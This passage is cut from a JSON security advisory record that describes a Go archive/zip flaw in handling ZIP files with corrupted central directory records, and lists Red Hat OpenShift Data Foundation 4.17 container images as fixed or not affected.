"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2292668"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang. The ZIP implementation of the Go language archive/zip library behaves differently than the rest of the ZIP file format implementations. When handling ZIP files with a corrupted central directory record, the library skips over the invalid record and processes the next valid one. This flaw allows a malicious user to access hidden information or files inside maliciously crafted ZIP files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Incorrect handling of certain ZIP files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-20: Improper Input Validation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. This minimizes the number of components that could be affected by input validation vulnerabilities. Security testing and evaluation standards are implemented within the environment to rigorously test input validation mechanisms during the development lifecycle, while static code analysis identifies potential input validation vulnerabilities by default. Process isolation ensures that processes handling potentially malicious or unvalidated inputs run in isolated environments by separating execution domains for each process. Malicious code protections, such as IPS/IDS and antimalware solutions, help detect and mitigate malicious payloads stemming from input validation vulnerabilities. Finally, robust input validation and error-handling mechanisms ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks further.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
